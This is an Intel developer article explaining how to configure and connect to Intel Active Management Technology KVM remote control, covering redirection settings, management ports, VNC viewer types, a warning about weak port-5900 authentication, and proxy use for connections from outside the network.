How To Create Intel® Active Management Technology KVM Solutions

ID 标签 673070
已更新 7/7/2016
版本 Latest
公共

author-image

作者

Creating a KVM connection

One of the most popular features of an Intel® vPro™ technology-based device is remote access via KVM (remote Keyboard, Video, Mouse). KVM allows remote control of a client even if the OS isn't running or if the system is asleep (AKA Out of Band). While traditional KVM requires additional hardware and software to access a client system. The Intel vPro KVM feature provides KVM over IP with no additional equipment required.

The KVM feature was first introduced with Intel® Active Management Technology (Intel® AMT) 6.0 and has improved in each release, by increasing supported screen resolution and multiple monitor support. The specific capabilities of each Intel AMT version can be found on the supported screen resolution and multiple monitor support page of the SDK documentation.

Like all the other features of Intel AMT, the client must first be enabled and configured. The process of configuration is discussed in one of my previous blogs called, "Intel vPro Setup and Configuration Integration". NOTE: Intel vPro branded systems are the only Intel AMT clients that support the KVM feature. "Standard Manageability" and "SMB" versions of Intel AMT do not include the KVM feature.

Additional Resources: KVM Features

Client Configuration

Additional Resources: Enable/Disable KVM Interface

While the KVM remote control feature can be configured as a part of the AMT configuration process, the feature parameters can also be configured at a later time. It is best practice to run a script or application to check and update the KVM status prior to making a KVM connection to the client. Those settings to required for KVM to work are:

  1. The KVM Redirection Settings
  2. The MEBx Settings
  3. The KVM Redirection Listener

The KVM Redirection Settings needs to be inspected by retrieving the instance of CIM_KVMRedirectionSAP and evaluating/setting the following property:

The MEBx and Port Settings needs to be validated by retrieving the instance of IPS_KVMRedirectionSettingData and evaluating/set the following properties:

The KVM Redirection Listener needs to be validated by retrieving the instance of AMT_RedirectionService and evaluating/setting the the following properties:

Making the Connection

Making an Intel AMT KVM connection involves a management system utilizing an application to communicate over a wired or wireless network directly to the client's Intel AMT firmware management ports. The ports utilized will determine the type of VNC viewer that must be used.

There are two general types of applications that can be used by the management system: HTTPS from a web browser or a VNC viewer.

The HTTPS option, as utilized by the open source project Mesh Commander, has a web server to make the connection to the client and displays the results within a web page.

The typical VNC viewer option come in many flavors, however they all make connection on port 5900. This is commonly referred to as the RFB (Remote Frame Buffer) port. Common VNC viewers are either RFB version 3.8 (Ultra VNC, Tight VNC and RealVNC), or RFB 4.0 (RealVNC Plus, KVMview, MeshCommander.) The RFB 3.8 protocol uses port 5900 exclusively.

The Intel AMT KVM uses ports other than port 5900. The default AMT ports for authentication is 16992 and the redirection port is 16994. If your using TLS the authentication and redirection ports change to 16993 and 16995, respectively. When using the Intel AMT redirection ports, authentication will be with the digest user and optionally Kerberos authentication. TLS is also an option.

If you use a Management Console, using HTML, consider additional TLS security when launching a viewer.

Important note: Intel AMT KVM supports port 5900 to allow using standard free KVM viewers based on RFC 6143 that are available on the market. However, before enabling this port in Intel AMT, the administrator should consider the following:

► When using port 5900, the KVM viewer authenticates itself to Intel AMT using VNC authentication. The VNC authentication is based on a password that is validated using the challenge-response based on DES cryptography. As stated in RFC 6143 section 7.2.2: “This type of authentication is known to be cryptographically weak and is not intended for use on untrusted networks”. “Cryptographically weak” means that if an attacker manages to break it, they can extract the password from the challenge-response.

► TLS is not supported on port 5900.

For additional information on integrating a KVM application into a Console, see the Intel KVM Application Developers Guide

Network Consideration

The network must be handled differently depending on whether it is a 'local' corporate network or going across open internet connections. Intel AMT only communicates on the local wired or wireless networks and any properly configured device and VNC application combination can make the connection. But anytime a connection comes from outside the network an Intel AMT proxy or Management Presence Server (MPS) must be used.

Proxy Configuration

Additional Resource: Intel AMT KVM Proxy 

The proxy application for Intel AMT KVM must be installed on the local network with the clients. It must have the correct port open for the VNC viewer application.

The basic flow for connection through a proxy is:

  1. The VNC client application viewer library directs the KVM Proxy to listen for KVM connections.
  2. The same library then opens an Intel KVM Remote Control connection to the Intel AMT Proxy listener.
  3. The VNC client application sends the Intel AMT platform connection/authentication data to the Intel AMT Proxy 
  4. The Intel AMT proxy opens the connection to the Intel AMT platform with the provided settings to the required port (redirection or VNC port).
  5. The Proxy relays the Intel KVM data between the viewer library and the Intel AMT client.
    Example of using the KVM Proxy Library API from within PowerShell

Additional resources and source code locations: 

  • Intel AMT SDK example application instructions for making the proxy connection
  • Example source code: \Windows\Intel_AMT\Src\KVM\KVMProxy\
  • Example source code: \Linux\Intel_AMT\Src\KVM\KVMProxy\
  • Example source code for proxy connection library: kvmlib.dll
  • Example Source Code: \Windows\Intel_AMT\Samples\KVM\KVMCustomTransportSample

 

Summary

Intel AMT KVM connections are a valuable resource for the technician. By allowing out of band communication we enlarge our tool set and reduce our need for desk side visit after a bit of setup of the clients and our management console. As developers it is our task to enable our software to exercise Intel AMT features such as  KVM.

In order for us to do that we need to configure the device, enable the  KVM feature set and then set up the connection as needed by our users.

Other Resources

 

"